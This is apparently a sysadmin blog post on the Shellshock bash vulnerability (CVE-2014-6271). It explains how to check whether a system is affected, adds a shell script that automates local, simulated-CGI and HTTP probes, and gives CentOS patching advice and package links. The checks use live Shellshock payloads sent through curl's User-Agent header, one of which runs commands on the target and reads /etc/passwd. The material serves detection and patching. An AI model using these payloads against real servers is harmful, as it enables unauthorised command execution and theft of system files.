This vulnerability is called Shellshock.
It is a critical-severity bug in the Linux BASH package. It affects anything that lets untrusted input reach bash through environment variables, most commonly shell-based CGI scripts and the devices that run them.
Check method 1
Run this directly on a Linux console:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If the string vulnerable is printed, the system is affected (a patched bash only echoes "this is a test" and may warn about ignoring the function definition).
Check method 2
vi /var/www/cgi-bin/test.cgi
#!/bin/sh
echo "Content-type: text/plain"
echo
echo "test"
(the blank line after the header is required by CGI; without it Apache rejects the script output as a malformed header)
chmod +x /var/www/cgi-bin/test.cgi
curl http://localhost/cgi-bin/test.cgi
Normally you will see test
curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/uname -a " http://localhost/cgi-bin/test.cgi
If the host is affected you will see something like:
Linux XXXXX 2.6.18-348.12.1.el5 #1 SMP Wed Jul 10 05:28:41 EDT 2013 x86_64 x86_64 x86_64 GNU/Linux
You can also do this:
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/test.cgi
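The two checks above depend on eyeballing the output. The script below is an added example (not part of the original post) that wraps both into functions returning a verdict. It assumes bash and curl are installed, and it uses an arbitrary marker string instead of uname output so a hit cannot be confused with the CGI's normal response. The second function also shows why the CGI check works at all: mod_cgi passes request headers to the script as HTTP_* environment variables (User-Agent becomes HTTP_USER_AGENT), so running the script under bash with that variable set reproduces what the web server does, no server needed.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumes bash and curl exist.
# MARKER is an arbitrary string we look for in the output.
MARKER="SHELLSHOCK-CHECK-$$"

# Check 1: local bash. A vulnerable bash runs the code after the function body
# while importing variable x from the environment; a patched one does not.
shellshock_local_check() {
    command -v bash >/dev/null 2>&1 || { echo "bash-missing"; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# Check 2 without a web server: write the same test.cgi as above to a temp
# file and run it under bash with HTTP_USER_AGENT set the way mod_cgi would.
# Note: /bin/sh is only affected where it is bash (e.g. CentOS); on systems
# where sh is dash the script is safe unless it invokes bash itself.
shellshock_cgi_sim() {
    command -v bash >/dev/null 2>&1 || { echo "bash-missing"; return 0; }
    tmp=$(mktemp) || return 1
    cat >"$tmp" <<'EOF'
#!/bin/sh
echo "Content-type: text/plain"
echo
echo "test"
EOF
    # Same payload shape as the curl -A check, with the marker in place of uname.
    payload="() { :;}; echo Content-type:text/plain;echo;echo $MARKER"
    out=$(HTTP_USER_AGENT="$payload" bash "$tmp" 2>/dev/null)
    rm -f "$tmp"
    case "$out" in
        *"$MARKER"*) echo "vulnerable" ;;
        *)           echo "patched" ;;
    esac
}

# Check 2 against a real target (the curl -A check, with the marker).
# Usage: shellshock_http_probe http://localhost/cgi-bin/test.cgi
shellshock_http_probe() {
    url=$1
    payload="() { :;}; echo Content-type:text/plain;echo;echo $MARKER"
    if curl -s -A "$payload" "$url" | grep -q "$MARKER"; then
        echo "vulnerable"
    else
        echo "patched"
    fi
}

# Stand-alone run: report both local verdicts.
echo "local bash: $(shellshock_local_check)"
echo "cgi sim:    $(shellshock_cgi_sim)"
```

Only probe hosts you are authorised to test; the marker payload is harmless by itself, but it is still arbitrary command execution on the target.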
Affected versions: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
How to patch: http://lists.centos.org/pipermail/centos/2014-September/146099.html
On CentOS just run yum update bash; nothing needs to be restarted, since every new shell (including each CGI request) picks up the fixed binary (long-running bash processes keep the old code until they exit). Re-run check 1 afterwards: the first round of bash packages for CVE-2014-6271 was incomplete and was followed by CVE-2014-7169, so make sure you end up on the later build.
As for CentOS 4 and earlier, don't bother upgrading; retire them.
Comments
http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/i386/getPackage/bash-3.0-27.0.3.el4.i386.rpm
bash-3.2-33.el5.1 needs a further update to 3.2-33.el5_10.4
bash-4.1.2-15.el6_5.1 needs a further update to 4.1.2-15.el6_5.2
bash-3.0-27.0.1.el4 needs a further update to bash-3.0-27.0.2.el4
http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/i386/getPackage/bash-3.0-27.0.2.el4.i386.rpm
CentOS 4 can also use this: http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/i386/getPackage/bash-3.0-27.0.1.el4.i386.rpm
ref: http://serverfault.com/questions/631055/how-do-i-patch-rhel-4-for-the-bash-vulnerabilities-in-cve-2014-6271-and-cve-2014